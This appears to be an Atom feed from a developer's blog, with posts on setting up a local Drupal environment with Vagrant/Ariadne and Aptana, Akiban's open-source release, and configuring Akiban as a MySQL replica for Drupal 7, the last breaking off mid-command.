<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
 
 <title>Padraig O'Sullivan</title>
 <link href="http://posulliv.github.com/atom.xml" rel="self"/>
 <link href="http://posulliv.github.com"/>
 <updated>2013-05-13T12:33:43-07:00</updated>
 <id>http://posulliv.github.com</id>
 <author>
   <name>Padraig O'Sullivan</name>
   <email>osullivan.padraig@gmail.com</email>
 </author>

 
 <entry>
   <title>Local Development with Ariadne</title>
   <link href="http://posulliv.github.com/2013/05/13/ariadne"/>
   <updated>2013-05-13T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2013/05/13/ariadne</id>
   <content type="html">&lt;p&gt;I recently started a new development position with &lt;a href='http://www.blinkreaction.com/'&gt;Blink Reaction&lt;/a&gt; so I needed to get somewhat serious about setting up a local Drupal development environment.&lt;/p&gt;

&lt;h2 id='ariadne'&gt;Ariadne&lt;/h2&gt;

&lt;p&gt;I was leaning towards making use of &lt;a href='http://www.vagrantup.com/'&gt;Vagrant&lt;/a&gt; for managing local development environments so I can easily switch between different projects or branches. I also believe Vagrant makes it easier to have as close a mirror to production locally as possible.&lt;/p&gt;

&lt;p&gt;I discovered a very interesting project from &lt;a href='http://myplanetdigital.com/'&gt;MyPlanet Digital&lt;/a&gt; named &lt;a href='https://github.com/myplanetdigital/vagrant-ariadne'&gt;vagrant-ariadne&lt;/a&gt;. Ariadne is a customized implementation of Vagrant and allows for easy deployment of Drupal installation profiles to a local VM. Another nice feature is that it attempts to emulate Acquia&amp;#8217;s infrastructure. This is useful as a lot of Blink&amp;#8217;s clients are deployed on the Acquia Cloud.&lt;/p&gt;

&lt;p&gt;Assuming you have Vagrant, rvm and a ruby environment installed on your workstation, installing Ariadne is pretty straightforward:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;j&lt;/span&gt;
&lt;span class='go'&gt;vagrant gem install vagrant-vbguest vagrant-hostmaster vagrant-librarian&lt;/span&gt;
&lt;span class='go'&gt;[sudo] gem install librarian rake knife-solo&lt;/span&gt;
&lt;span class='go'&gt;git clone https://github.com/myplanetdigital/vagrant-ariadne.git&lt;/span&gt;
&lt;span class='go'&gt;cd vagrant-ariadne&lt;/span&gt;
&lt;span class='go'&gt;bundle install&lt;/span&gt;
&lt;span class='go'&gt;bundle exec rake setup&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Everything is now configured to boot a virtual box. Ariadne comes with a simple example that can be deployed:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;j&lt;/span&gt;
&lt;span class='go'&gt;project=example vagrant up&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once that command finishes running, the site can be viewed at &lt;code&gt;http://example.dev/&lt;/code&gt; (Ariadne uses &lt;a href='https://github.com/mosaicxm/vagrant-hostmaster'&gt;vagrant-hostmaster&lt;/a&gt; for managing &lt;code&gt;/etc/hosts&lt;/code&gt; entries).&lt;/p&gt;

&lt;p&gt;A more involved cookbook is a cookbook for deploying the &lt;a href='https://github.com/wet-boew/wet-boew-drupal'&gt;Web Experience Toolkit&lt;/a&gt; available on &lt;a href='https://github.com/patcon/ariadne-wet-boew-drupal'&gt;github also&lt;/a&gt;. If we wanted to deploy the master branch of this site, we could do:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;
bundle exec rake &amp;quot;init_project[https://github.com/wet-boew/ariadne-wet-boew-drupal]&amp;quot;
project=wet-boew-drupal branch=master vagrant up
&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;And that&amp;#8217;s it!&lt;/p&gt;

&lt;p&gt;Another nice feature of these deployed environments is that they are configured to allow remote debugging (relevant when setting up an IDE as mentioned later) and the actual site code is shared as an NFS mount. For example, the contents of my &lt;code&gt;/etc/exports&lt;/code&gt; file after booting a box with Ariadne looks like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;#&lt;/span&gt; VAGRANT-BEGIN: 7ac1cf50-4498-4e49-bd66-edac4a9b2d7e
&lt;span class='go'&gt;&amp;quot;/Users/posullivan/vagrant-ariadne/tmp/apt/cache&amp;quot; 33.33.33.10 -mapall=501:20&lt;/span&gt;
&lt;span class='go'&gt;&amp;quot;/Users/posullivan/vagrant-ariadne/tmp/drush/cache&amp;quot; 33.33.33.10 -mapall=501:20&lt;/span&gt;
&lt;span class='go'&gt;&amp;quot;/Users/posullivan/vagrant-ariadne/data/html&amp;quot; 33.33.33.10 -mapall=501:20&lt;/span&gt;
&lt;span class='gp'&gt;#&lt;/span&gt; VAGRANT-END: 7ac1cf50-4498-4e49-bd66-edac4a9b2d7e
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Thus, if I navigate to the &lt;code&gt;~/vagrant-ariadne/data/html&lt;/code&gt; directory or import that in my IDE, I can edit the code deployed on the vagrant box.&lt;/p&gt;

&lt;h3 id='drupal_core_from_git'&gt;Drupal Core from git&lt;/h3&gt;

&lt;p&gt;Another use I&amp;#8217;ve found for ariadne is building a local environment for the latest drupal core. To accomplish this, I created a role file named &lt;code&gt;roles/core.rb&lt;/code&gt; with the following contents:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='nb'&gt;name&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;core&amp;quot;&lt;/span&gt;
&lt;span class='n'&gt;description&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;Install requirements to run Drupal core.&amp;quot;&lt;/span&gt;
&lt;span class='n'&gt;run_list&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[mysql::server]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[mysql::client]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[php::module_mysql]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[php::module_curl]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[php::module_gd]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[php::module_apc]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[drush::utils]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[drush::make]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;recipe[php::write_inis]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
&lt;span class='o'&gt;]&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
&lt;span class='n'&gt;default_attributes&lt;/span&gt;&lt;span class='p'&gt;({&lt;/span&gt;
  &lt;span class='ss'&gt;:drush&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='p'&gt;{&lt;/span&gt;
    &lt;span class='ss'&gt;:version&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;5.8.0&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='p'&gt;},&lt;/span&gt;
  &lt;span class='ss'&gt;:mysql&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='p'&gt;{&lt;/span&gt;
    &lt;span class='ss'&gt;:server_debian_password&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;root&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
    &lt;span class='ss'&gt;:server_root_password&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;root&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
    &lt;span class='ss'&gt;:server_repl_password&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;root&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
    &lt;span class='ss'&gt;:bind_address&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;127.0.0.1&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
    &lt;span class='ss'&gt;:tunable&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='p'&gt;{&lt;/span&gt;
      &lt;span class='ss'&gt;:key_buffer&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;384M&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
      &lt;span class='ss'&gt;:table_cache&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;4096&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
    &lt;span class='p'&gt;},&lt;/span&gt;
  &lt;span class='p'&gt;},&lt;/span&gt;
&lt;span class='p'&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;j&lt;/p&gt;

&lt;p&gt;Next, I created a new cookbook project named &lt;code&gt;core&lt;/code&gt; and created a simple &lt;code&gt;default.rb&lt;/code&gt; recipe for this cookbook. This recipe looks like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='n'&gt;branch&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;ariadne&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;][&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;branch&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt;

&lt;span class='n'&gt;git&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;/mnt/www/html/drupal&amp;quot;&lt;/span&gt; &lt;span class='k'&gt;do&lt;/span&gt;
  &lt;span class='n'&gt;user&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;vagrant&amp;quot;&lt;/span&gt;
  &lt;span class='n'&gt;repository&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;http://git.drupal.org/project/drupal.git&amp;quot;&lt;/span&gt;
  &lt;span class='n'&gt;reference&lt;/span&gt; &lt;span class='n'&gt;branch&lt;/span&gt;
  &lt;span class='n'&gt;enable_submodules&lt;/span&gt; &lt;span class='kp'&gt;true&lt;/span&gt;
  &lt;span class='n'&gt;action&lt;/span&gt; &lt;span class='ss'&gt;:sync&lt;/span&gt;
  &lt;span class='n'&gt;notifies&lt;/span&gt; &lt;span class='ss'&gt;:run&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;bash[Installing Drupal...]&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='ss'&gt;:immediately&lt;/span&gt;
&lt;span class='k'&gt;end&lt;/span&gt;

&lt;span class='n'&gt;bash&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;Installing Drupal...&amp;quot;&lt;/span&gt; &lt;span class='k'&gt;do&lt;/span&gt;
  &lt;span class='n'&gt;user&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;vagrant&amp;quot;&lt;/span&gt;
  &lt;span class='n'&gt;group&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;vagrant&amp;quot;&lt;/span&gt;
  &lt;span class='n'&gt;code&lt;/span&gt; &lt;span class='o'&gt;&amp;lt;&amp;lt;-&lt;/span&gt;&lt;span class='no'&gt;EOH&lt;/span&gt;
&lt;span class='sh'&gt;    drush -y si \&lt;/span&gt;
&lt;span class='sh'&gt;      --root=/mnt/www/html/drupal \&lt;/span&gt;
&lt;span class='sh'&gt;      --db-url=mysqli://root:root@localhost/drupal \&lt;/span&gt;
&lt;span class='sh'&gt;      --site-name=&amp;quot;Drupal Core Installed from Git&amp;quot; \&lt;/span&gt;
&lt;span class='sh'&gt;      --site-mail=vagrant+site@localhost \&lt;/span&gt;
&lt;span class='sh'&gt;      --account-mail=vagrant+admin@locahost \&lt;/span&gt;
&lt;span class='sh'&gt;      --account-name=admin \&lt;/span&gt;
&lt;span class='sh'&gt;      --account-pass=admin&lt;/span&gt;
&lt;span class='no'&gt;  EOH&lt;/span&gt;
&lt;span class='k'&gt;end&lt;/span&gt;

&lt;span class='n'&gt;site&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;ariadne&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;][&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;host_name&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;].&lt;/span&gt;&lt;span class='n'&gt;nil?&lt;/span&gt; &lt;span class='p'&gt;?&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;&lt;/span&gt;&lt;span class='si'&gt;#{&lt;/span&gt;&lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;ariadne&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;][&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;project&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt;&lt;span class='si'&gt;}&lt;/span&gt;&lt;span class='s2'&gt;.dev&amp;quot;&lt;/span&gt; &lt;span class='p'&gt;:&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;ariadne&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;][&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;host_name&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt;

&lt;span class='n'&gt;web_app&lt;/span&gt; &lt;span class='n'&gt;site&lt;/span&gt; &lt;span class='k'&gt;do&lt;/span&gt;
  &lt;span class='n'&gt;cookbook&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;ariadne&amp;quot;&lt;/span&gt;
  &lt;span class='n'&gt;template&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;drupal-site.conf.erb&amp;quot;&lt;/span&gt;
  &lt;span class='n'&gt;port&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;apache&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;][&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;listen_ports&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;].&lt;/span&gt;&lt;span class='n'&gt;to_a&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt;
  &lt;span class='n'&gt;server_name&lt;/span&gt; &lt;span class='n'&gt;site&lt;/span&gt;
  &lt;span class='n'&gt;server_aliases&lt;/span&gt; &lt;span class='o'&gt;[&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;www.&lt;/span&gt;&lt;span class='si'&gt;#{&lt;/span&gt;&lt;span class='n'&gt;site&lt;/span&gt;&lt;span class='si'&gt;}&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;&lt;/span&gt; &lt;span class='o'&gt;]&lt;/span&gt;
  &lt;span class='n'&gt;docroot&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;/mnt/www/html/drupal&amp;quot;&lt;/span&gt;
  &lt;span class='n'&gt;notifies&lt;/span&gt; &lt;span class='ss'&gt;:reload&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;service[apache2]&amp;quot;&lt;/span&gt;
&lt;span class='k'&gt;end&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With all of the above in place, its quite simple to create a local VM based on the latest in the &lt;code&gt;7.x&lt;/code&gt; branch of drupal core:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nv'&gt;project&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;core &lt;span class='nv'&gt;branch&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;7.x vagrant up
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The above command simply needs to have the branch name modified to deploy a different branch. Once the above command completes, a site will be available at &lt;code&gt;core.dev&lt;/code&gt; and I can log in as the &lt;code&gt;admin&lt;/code&gt; user using the credentials specified in my cookbook.&lt;/p&gt;

&lt;h3 id='private_repositories'&gt;Private Repositories&lt;/h3&gt;

&lt;p&gt;Most repositories for client projects are stored in private repositories. Thankfully, thats not an issue with ariadne. Ariadne uses agent forwarding to forward the host machine&amp;#8217;s ssh session into the VM, including keys and passphrases stored by ssh-agent. What this means is that your VM will have the same Git/SSH access that you enjoy on your local machine. I&amp;#8217;ve not had a problem checking out code stored in private repositories on bitbucket for example.&lt;/p&gt;

&lt;h2 id='ide'&gt;IDE&lt;/h2&gt;

&lt;p&gt;For an IDE, I&amp;#8217;ve been an Eclipse user in the past for Java projects I&amp;#8217;ve worked on so &lt;a href='http://www.aptana.org/'&gt;Aptana&lt;/a&gt; seemed like a good fit for my needs at the moment. A few &lt;a href='http://www.pixelite.co.nz/article/configuring-aptana-drupal-development'&gt;existing&lt;/a&gt; &lt;a href='http://knackforge.com/blog/vannia/setting-aptana-studio-3-ide-drupal-development'&gt;articles&lt;/a&gt; already exist on configuring Aptana for Drupal development so I&amp;#8217;m not going to go into too much details here.&lt;/p&gt;

&lt;p&gt;Installation is very straightforward with the binary downloaded from the &lt;a href='http://www.aptana.org/'&gt;site&lt;/a&gt;. A ruble exists for Drupal so its pretty natural to install that:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;git clone git://github.com/arcaneadam/Drupal-Bundle-for-Aptana.git ~/Documents/Aptana Rubles/Drupal-Bundle-for-Aptana&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next item is to configure Aptana to adhere to the Drupal coding standards. I used an &lt;a href='https://github.com/fxarte/Aptana-Drupal-PHP.profile'&gt;existing profile for Aptana&lt;/a&gt; that could be imported for this.&lt;/p&gt;

&lt;p&gt;The final thing I needed to configure was a debug configuration. To do this, I created a new PHP web page configuration. First, a new PHP server needs to be added. In this example, lets assume I am using the example box I mentioned in the Ariadne section whose hostname is &lt;code&gt;example.dev&lt;/code&gt;. The web server configuration dialog when configured with this hostname and appropriate directory for the site root looks like:&lt;/p&gt;

&lt;p&gt;&lt;img src='/images/aptana_first.png' alt='image' /&gt;&lt;/p&gt;

&lt;p&gt;Once a PHP server has been added, the rest of the information to fill in for the debug configuration is pretty straightforward as shown below:&lt;/p&gt;

&lt;p&gt;&lt;img src='/images/aptana_second.png' alt='image' /&gt;&lt;/p&gt;

&lt;p&gt;I like to select the break at first line option to make sure the debug configuration works correctly.&lt;/p&gt;

&lt;p&gt;With this in place, any visit to &lt;code&gt;example.dev&lt;/code&gt; will result in the breakpoint being hit.&lt;/p&gt;

&lt;h2 id='conclusion'&gt;Conclusion&lt;/h2&gt;

&lt;p&gt;I&amp;#8217;ve still not settled on this combination for my development environment but I was definitely pretty excited upon discovering the Ariadne project. The drawbacks that I see to using Ariadne are: 1) the need to create a cookbook for each project you want to work with, 2) the project is still in beta stage so documentation is fairly lacking (fair enough for a beta project though), and 3) if you are not familiar with &lt;a href='http://www.opscode.com/chef/'&gt;chef&lt;/a&gt;, using Ariadne may prove challenging (although it provides the perfect excuse to become familiar with chef).&lt;/p&gt;

&lt;p&gt;PHPStorm is the IDE that seems to be pretty popular when I ask what other people are using for an editor but given there is a license fee associated with it, I didn&amp;#8217;t want to splurge on that just yet. Aptana looks to work just fine for me and satisfies my needs nicely.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Akiban is Now Open Source</title>
   <link href="http://posulliv.github.com/2013/04/02/akiban-open-source"/>
   <updated>2013-04-02T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2013/04/02/akiban-open-source</id>
   <content type="html">&lt;p&gt;I&amp;#8217;ve written a lot about the work I do for &lt;a href='http://akiban.com/'&gt;Akiban&lt;/a&gt; with Drupal in the past and many people would ask if Akiban was open source software. Well in the last few weeks we actually open sourced our &lt;a href='http://github.com/akiban/akiban-server'&gt;database server&lt;/a&gt;. We also have &lt;a href='http://software.akiban.com/releases/1.6.0/installers/'&gt;downloads&lt;/a&gt; for various platforms such as Windows and OSX besides binary packages for Linux variants.&lt;/p&gt;

&lt;p&gt;I &lt;a href='http://posulliv.github.com/2012/12/14/drupal-7-install-akiban/'&gt;wrote previously&lt;/a&gt; about how to install Drupal 7 completely on &lt;a href='http://akiban.com/'&gt;Akiban&lt;/a&gt;. You can still follow that post to get up and running except now there is a tiny change for our public repositories:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo apt-get install -y python-software-properties&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-key adv --keyserver keyserver.ubuntu.com --recv 0AA4244A&lt;/span&gt;
&lt;span class='go'&gt;sudo add-apt-repository &amp;quot;deb http://software.akiban.com/apt-public/ lucid main&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get update&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get install -y akiban-server postgresql-client&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Some of the things included in our open source database are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href='http://docs.akiban.org/en/latest/service/spatial.html'&gt;spatial indexes&lt;/a&gt;&lt;/li&gt;

&lt;li&gt;&lt;a href='http://docs.akiban.org/en/latest/service/fulltext.html'&gt;full text indexes&lt;/a&gt; (implemented using Lucene)&lt;/li&gt;

&lt;li&gt;&lt;a href='https://akiban.readthedocs.org/en/latest/service/restapireference.html'&gt;REST access&lt;/a&gt;&lt;/li&gt;

&lt;li&gt;&lt;a href='https://akiban.readthedocs.org/en/latest/quickstart/nested.html'&gt;nested SQL&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We are also working on offering on a service offering for our database server so there will be no need to manage an installation yourself. If you are interested in trying our service in its current beta form, please let me know in the comments or hit me up on &lt;a href='https://twitter.com/intent/user?screen_name=posulliv'&gt;twitter&lt;/a&gt; and I&amp;#8217;d be happy to hook you up or just visit our &lt;a href='http://akiban.com/'&gt;website&lt;/a&gt;. We also have a &lt;a href='https://groups.google.com/a/akiban.com/d/forum/akiban-user'&gt;public mailing list&lt;/a&gt; for the Akiban project if you try anything out and have any questions.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Akiban as a MySQL Replica with Drupal 7</title>
   <link href="http://posulliv.github.com/2013/01/11/akiban-augment"/>
   <updated>2013-01-11T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2013/01/11/akiban-augment</id>
   <content type="html">&lt;p&gt;I &lt;a href='http://posulliv.github.com/2012/12/14/drupal-7-install-akiban/'&gt;previously wrote&lt;/a&gt; about how to install Drupal 7 completely on &lt;a href='http://akiban.com/'&gt;Akiban&lt;/a&gt;. However, this is not how our current customers are using us. The vast majority of all Drupal installations currently run on MySQL. What we at Akiban are currently aiming to do is to be deployed as a regular MySQL slave and if there are any queries that are problematic for MySQL, we work with customers to make sure those queries get executed by Akiban (and with a significant performance improvement).&lt;/p&gt;

&lt;p&gt;In this post, I wanted to cover how to setup Akiban as a MySQL slave and how a query is typically re-directed to an Akiban server from Drupal. This article is specific to Drupal 7.&lt;/p&gt;

&lt;p&gt;First, I setup a regular Drupal install on Ubuntu 12.04 with MySQL 5.5.28. This is going to serve as the master server. To configure replication in MySQL is pretty &lt;a href='http://dev.mysql.com/doc/refman/5.5/en/replication-howto.html'&gt;straightforward&lt;/a&gt;. The following needs to be placed in your &lt;code&gt;my.cnf&lt;/code&gt; file and MySQL needs to be re-started:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;log-bin=mysql-bin&lt;/span&gt;
&lt;span class='go'&gt;server-id=11&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A user needs to be created for replication:&lt;/p&gt;

&lt;p&gt;&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;CREATE USER &amp;#39;repl&amp;#39;@&amp;#39;%&amp;#39; IDENTIFIED BY &amp;#39;password&amp;#39;;&lt;/span&gt;
&lt;span class='go'&gt;GRANT REPLICATION SLAVE ON *.* TO &amp;#39;repl&amp;#39;@&amp;#39;%&amp;#39;;&lt;/span&gt;
&lt;span class='go'&gt;FLUSH PRIVILEGES;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/p&gt;

&lt;p&gt;Next steps are to take a consistent snapshot of your Drupal schema with &lt;code&gt;mysqldump&lt;/code&gt; and capture the output of &lt;code&gt;SHOW MASTER STATUS&lt;/code&gt; to get the appropriate binlog co-ordinates.&lt;/p&gt;

&lt;p&gt;Next, we need to setup an Akiban MySQL slave. We will use an entirely separate instance for this purpose. First, the software to install on this slave is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo apt-get install -y mysql-client mysql-server&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get install -y python-software-properties&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-key adv --keyserver keyserver.ubuntu.com --recv 0AA4244A&lt;/span&gt;
&lt;span class='go'&gt;sudo add-apt-repository &amp;quot;deb http://software.akiban.com/apt-developer/lucid main&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get update&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get install -y akiban-server akiban-adapter-mysql postgresql-client&lt;/span&gt;
&lt;span class='go'&gt;echo &amp;quot;INSTALL PLUGIN akibandb SONAME &amp;#39;libakibandb_engine.so&amp;#39;&amp;quot; | mysql -u&lt;/span&gt;
&lt;span class='go'&gt;root&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Issuing the &lt;code&gt;SHOW PLUGINS&lt;/code&gt; command on this slave will now show the &lt;code&gt;AkibanDB&lt;/code&gt; storage engine. The next step is to now import the &lt;code&gt;mysqldump&lt;/code&gt; file taken from the master and configure replication. On the slave server, you need to make sure &lt;code&gt;server-id&lt;/code&gt; is set in the &lt;code&gt;my.cnf&lt;/code&gt; file. Then to enable replication, a &lt;code&gt;CHANGE MASTER&lt;/code&gt; command needs to be issued. An example of what that command might look like is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;CHANGE MASTER TO&lt;/span&gt;
&lt;span class='go'&gt;  MASTER_HOST = &amp;#39;ec2-23-20-112-161.compute-1.amazonaws.com&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;  MASTER_USER = &amp;#39;repl&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;  MASTER_PASSWORD = &amp;#39;password&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;  MASTER_LOG_FILE = &amp;#39;mysql-bin.000001&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;  MASTER_LOG_POS = 403&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally, issuing &lt;code&gt;START SLAVE&lt;/code&gt; starts up replication. The observant among you will notice all tables are still InnoDB on the slave. We have done nothing to convert any tables to Akiban yet. Before we get to that I want to configure Drupal running on the master server to know about the Akiban slave so it can send queries to it. First, we need to install the &lt;a href='http://drupal.org/sandbox/posulliv/1835778'&gt;Akiban database module&lt;/a&gt; in Drupal (the akiban directory should be copied to whatever the appropriate location for your Drupal install is) and the PHP client drivers for PostgreSQL:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo apt-get install -y git php5-pgsql&lt;/span&gt;
&lt;span class='go'&gt;git clone http://git.drupal.org/sandbox/posulliv/1835778.git akiban&lt;/span&gt;
&lt;span class='go'&gt;cd akiban&lt;/span&gt;
&lt;span class='go'&gt;git checkout 7.x&lt;/span&gt;
&lt;span class='go'&gt;cd ../&lt;/span&gt;
